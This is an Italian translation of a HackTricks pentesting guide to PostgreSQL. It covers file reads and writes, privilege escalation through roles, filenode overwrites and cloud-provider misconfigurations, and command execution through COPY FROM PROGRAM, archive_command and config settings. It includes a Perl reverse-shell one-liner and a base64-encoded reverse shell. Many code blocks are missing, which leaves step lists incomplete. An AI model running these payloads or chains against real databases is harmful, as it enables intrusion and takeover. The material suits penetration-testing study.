Usa [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) per costruire e **automatizzare flussi di lavoro** facilmente, alimentati dagli **strumenti** della comunità **più avanzati** al mondo.\
Impara e pratica Hacking AWS:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Impara e pratica Hacking GCP: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
**PostgreSQL** è descritto come un **sistema di database oggetto-relazionale** che è **open source**. Questo sistema non solo utilizza il linguaggio SQL, ma lo migliora anche con funzionalità aggiuntive. Le sue capacità gli consentono di gestire un'ampia gamma di tipi di dati e operazioni, rendendolo una scelta versatile per sviluppatori e organizzazioni.
**Porta predefinita:** 5432, e se questa porta è già in uso sembra che postgresql utilizzerà la porta successiva (probabilmente 5433) che non è in uso.
Secondo [**questa ricerca**](https://www.exploit-db.com/papers/13084), quando un tentativo di connessione fallisce, `dblink` genera un'eccezione `sqlclient_unable_to_establish_sqlconnection` che include una spiegazione dell'errore. Esempi di questi dettagli sono elencati di seguito.
`DETAIL: impossibile connettersi al server: Nessuna rotta verso l'host. Il server è in esecuzione sull'host "1.2.3.4" e accetta connessioni TCP/IP sulla porta 5678?`
In PL/pgSQL, attualmente non è possibile ottenere dettagli sulle eccezioni. Tuttavia, se hai accesso diretto al server PostgreSQL, puoi recuperare le informazioni necessarie. Se estrarre nomi utente e password dalle tabelle di sistema non è fattibile, potresti considerare di utilizzare il metodo di attacco wordlist discusso nella sezione precedente, poiché potrebbe potenzialmente dare risultati positivi.
| rolsuper | Il ruolo ha privilegi di superutente |
| rolinherit | Il ruolo eredita automaticamente i privilegi dei ruoli di cui è membro |
| rolcreaterole | Il ruolo può creare altri ruoli |
| rolcreatedb | Il ruolo può creare database |
| rolcanlogin | Il ruolo può accedere. Cioè, questo ruolo può essere dato come identificatore di autorizzazione della sessione iniziale |
| rolreplication | Il ruolo è un ruolo di replica. Un ruolo di replica può avviare connessioni di replica e creare e rimuovere slot di replica. |
| rolconnlimit | Per i ruoli che possono accedere, questo imposta il numero massimo di connessioni concorrenti che questo ruolo può effettuare. -1 significa nessun limite. |
| rolpassword | Non la password (legge sempre come `********`) |
| rolvaliduntil | Tempo di scadenza della password (utilizzato solo per l'autenticazione della password); null se non c'è scadenza |
| rolbypassrls | Il ruolo ignora ogni politica di sicurezza a livello di riga, vedere [Sezione 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) per ulteriori informazioni. |
| rolconfig | Valori predefiniti specifici per il ruolo per le variabili di configurazione a runtime |
Da questo [**commit** ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) i membri del gruppo definito **`DEFAULT_ROLE_READ_SERVER_FILES`** (chiamato **`pg_read_server_files`**) e **super utenti** possono utilizzare il metodo **`COPY`** su qualsiasi percorso (controlla `convert_and_check_filename` in `genfile.c`):
Ci sono **altre funzioni postgres** che possono essere utilizzate per **leggere file o elencare una directory**. Solo **superuser** e **utenti con permessi espliciti** possono usarle:
Ricorda che COPY non può gestire i caratteri di nuova riga, quindi anche se stai usando un payload base64 **devi inviare una riga unica**.\
Una limitazione molto importante di questa tecnica è che **`copy` non può essere usato per scrivere file binari poiché modifica alcuni valori binari.**
**Suggerimento per bug bounty**: **iscriviti** a **Intigriti**, una premium **piattaforma di bug bounty creata da hacker, per hacker**! Unisciti a noi su [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) oggi, e inizia a guadagnare ricompense fino a **$100,000**!
Se hai i permessi necessari per leggere e scrivere i file del server PostgreSQL, puoi aggiornare qualsiasi tabella sul server **sovrascrivendo il nodo file associato** nella [directory dei dati di PostgreSQL](https://www.postgresql.org/docs/8.1/storage.html). **Ulteriori informazioni su questa tecnica** [**qui**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users).
**Nota:** Se non riesci a recuperare il percorso della directory dei dati corrente dalle impostazioni, puoi interrogare la versione principale di PostgreSQL tramite la query `SELECT version()` e provare a forzare il percorso. I percorsi comuni della directory dei dati nelle installazioni Unix di PostgreSQL sono `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`. Un nome di cluster comune è `main`.
2. Ottieni un percorso relativo al filenode, associato alla tabella target
Questa query dovrebbe restituire qualcosa come `base/3/1337`. Il percorso completo su disco sarà `$DATA_DIRECTORY/base/3/1337`, cioè `/var/lib/postgresql/13/main/base/3/1337`.
5. Usa il [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) per [modificare il filenode](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users); imposta tutti i flag booleani `rol*` a 1 per permessi completi.
Puoi anche diventare un superadmin modificando la tabella `pg_authid`. **Vedi** [**la sezione seguente**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables).
Dalla [versione 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), solo **super utenti** e membri del gruppo **`pg_execute_server_program`** possono usare copy per RCE (esempio con esfiltrazione:
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
Oppure usa il modulo `multi/postgres/postgres_copy_from_program_cmd_exec` di **metasploit**.\
Ulteriori informazioni su questa vulnerabilità [**qui**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Sebbene sia stata segnalata come CVE-2019-9193, Postges ha dichiarato che si trattava di una [caratteristica e non sarà corretta](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
Una volta che hai **imparato** dal post precedente **come caricare file binari**, potresti provare a ottenere **RCE caricando un'estensione postgresql e caricandola**.
I seguenti vettori RCE sono particolarmente utili in contesti SQLi ristretti, poiché tutti i passaggi possono essere eseguiti tramite istruzioni SELECT annidate
Il **file di configurazione** di PostgreSQL è **scrivibile** dall'**utente postgres**, che è quello che esegue il database, quindi come **superutente**, puoi scrivere file nel filesystem e, pertanto, puoi **sovrascrivere questo file.**
*`ssl_passphrase_command = ''` Se il file privato è protetto da password (crittografato), postgresql **eseguirà il comando indicato in questo attributo**.
*`ssl_passphrase_command_supports_reload = off`**Se** questo attributo è **attivato**, il **comando** eseguito se la chiave è protetta da password **verrà eseguito** quando `pg_reload_conf()` è **eseguito**.
Durante il test di questo, ho notato che funzionerà solo se il **file della chiave privata ha privilegi 640**, è **di proprietà di root** e del **gruppo ssl-cert o postgres** (quindi l'utente postgres può leggerlo) ed è posizionato in _/var/lib/postgresql/12/main_.
**Ulteriori** [**informazioni su questa configurazione e su WAL qui**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.**
Per farlo funzionare, l'impostazione `archive_mode` deve essere `'on'` o `'always'`. Se ciò è vero, allora potremmo sovrascrivere il comando in `archive_command` e costringerlo a eseguire tramite le operazioni WAL (write-ahead logging).
2. Sovrascrivere `archive_command` con il payload. Ad esempio, una reverse shell: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
4. Forzare l'operazione WAL a essere eseguita, che chiamerà il comando di archiviazione: `SELECT pg_switch_wal()` o `SELECT pg_switch_xlog()` per alcune versioni di Postgres
Possiamo impostare il valore di `dynamic_library_path` su una directory, scrivibile dall'utente `postgres` che esegue il database, ad esempio, la directory `/tmp/`, e caricare un oggetto `.so` dannoso lì. Successivamente, costringeremo il server PostgreSQL a caricare la nostra libreria appena caricata includendola nella variabile `session_preload_libraries`.
Secondo la [**documentazione**](https://www.postgresql.org/docs/13/sql-grant.html): _I ruoli che hanno il privilegio **`CREATEROLE`** possono **concedere o revocare l'appartenenza a qualsiasi ruolo** che **non** è un **superutente**._
Quindi, se hai il permesso **`CREATEROLE`**, potresti concederti accesso ad altri **ruoli** (che non sono superutente) che possono darti l'opzione di leggere e scrivere file ed eseguire comandi:
È abbastanza comune scoprire che **gli utenti locali possono accedere a PostgreSQL senza fornire alcuna password**. Pertanto, una volta che hai ottenuto **permessi per eseguire codice** puoi abusare di questi permessi per concederti il ruolo di **`SUPERUSER`**:
In [**questo articolo**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) viene spiegato come sia stato possibile **privesc** in Postgres GCP abusando del privilegio ALTER TABLE che è stato concesso all'utente.
Quando si cerca di **rendere un altro utente proprietario di una tabella**, si dovrebbe ricevere un **errore** che lo impedisce, ma apparentemente GCP ha dato quella **opzione all'utente postgres non superuser** in GCP:
Unendo questa idea con il fatto che quando i comandi **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) vengono eseguiti su una **tabella con una funzione di indice**, la **funzione** viene **chiamata** come parte del comando con i **permessi** del **proprietario della tabella**. È possibile creare un indice con una funzione e dare i permessi di proprietario a un **super user** su quella tabella, e poi eseguire ANALYZE sulla tabella con la funzione malevola che sarà in grado di eseguire comandi perché utilizza i privilegi del proprietario.
2. Inserisci del contenuto irrilevante nella tabella per fornire dati per la funzione di indicizzazione.
3. Sviluppa una funzione di indicizzazione malevola che contiene un payload di esecuzione del codice, consentendo l'esecuzione di comandi non autorizzati.
4. ALTERA il proprietario della tabella in "cloudsqladmin," che è il ruolo di superutente di GCP utilizzato esclusivamente da Cloud SQL per gestire e mantenere il database.
5. Esegui un'operazione ANALYZE sulla tabella. Questa azione costringe il motore PostgreSQL a passare al contesto utente del proprietario della tabella, "cloudsqladmin." Di conseguenza, la funzione di indicizzazione malevola viene chiamata con i permessi di "cloudsqladmin," consentendo così l'esecuzione del comando shell precedentemente non autorizzato.
Alcune istanze di postgresql mal configurate potrebbero consentire l'accesso a qualsiasi utente locale, è possibile accedere localmente da 127.0.0.1 utilizzando la **`dblink` function**:
Se hai la password di un utente con più privilegi, ma l'utente non è autorizzato a effettuare il login da un IP esterno, puoi utilizzare la seguente funzione per eseguire query come quell'utente:
[**In questo writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), i pentester sono stati in grado di privesc all'interno di un'istanza postgres fornita da IBM, perché hanno **trovato questa funzione con il flag SECURITY DEFINER**:
Come [**spiegato nella documentazione**](https://www.postgresql.org/docs/current/sql-createfunction.html), una funzione con **SECURITY DEFINER viene eseguita** con i privilegi dell'**utente che la possiede**. Pertanto, se la funzione è **vulnerabile a SQL Injection** o sta eseguendo alcune **azioni privilegiate con parametri controllati dall'attaccante**, potrebbe essere abusata per **escalare privilegi all'interno di postgres**.
**PL/pgSQL** è un **linguaggio di programmazione completo** che offre un maggiore controllo procedurale rispetto a SQL. Consente l'uso di **cicli** e altre **strutture di controllo** per migliorare la logica del programma. Inoltre, le **istruzioni SQL** e i **trigger** hanno la capacità di invocare funzioni create utilizzando il **linguaggio PL/pgSQL**. Questa integrazione consente un approccio più completo e versatile alla programmazione e automazione del database.\
**Puoi abusare di questo linguaggio per chiedere a PostgreSQL di eseguire un attacco di brute-force sulle credenziali degli utenti.**
Il seguente vettore di privesc è particolarmente utile in contesti SQLi ristretti, poiché tutti i passaggi possono essere eseguiti tramite istruzioni SELECT annidate
Se puoi **leggere e scrivere file del server PostgreSQL**, puoi **diventare un superuser** sovrascrivendo il filenode su disco di PostgreSQL, associato alla tabella interna `pg_authid`.
4. Ottenere il tipo di dato, associato alla tabella `pg_authid`
5. Utilizzare il [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) per [modificare il filenode](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg\_authid-table); impostare tutti i flag booleani `rol*` a 1 per permessi completi.
6. Ricaricare il filenode modificato tramite le funzioni `lo_*`, e sovrascrivere il file originale su disco
7._(Opzionalmente)_ Cancellare la cache della tabella in memoria eseguendo una query SQL costosa
8. Ora dovresti avere i privilegi di un superadmin completo.
Puoi trovare **password** all'interno del file _**pgadmin4.db**_\
Puoi decrittarle usando la funzione _**decrypt**_ all'interno dello script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
L'autenticazione del client in PostgreSQL è gestita tramite un file di configurazione chiamato **pg\_hba.conf**. Questo file contiene una serie di record, ciascuno dei quali specifica un tipo di connessione, un intervallo di indirizzi IP del client (se applicabile), il nome del database, il nome utente e il metodo di autenticazione da utilizzare per le connessioni corrispondenti. Il primo record che corrisponde al tipo di connessione, all'indirizzo del client, al database richiesto e al nome utente viene utilizzato per l'autenticazione. Non c'è alcun fallback o backup se l'autenticazione fallisce. Se nessun record corrisponde, l'accesso è negato.
I metodi di autenticazione basati su password disponibili in pg\_hba.conf sono **md5**, **crypt** e **password**. Questi metodi differiscono nel modo in cui la password viene trasmessa: hashata MD5, crittografata con crypt o in chiaro. È importante notare che il metodo crypt non può essere utilizzato con password che sono state crittografate in pg\_authid.
Learn & practice AWS Hacking:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Learn & practice GCP Hacking: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
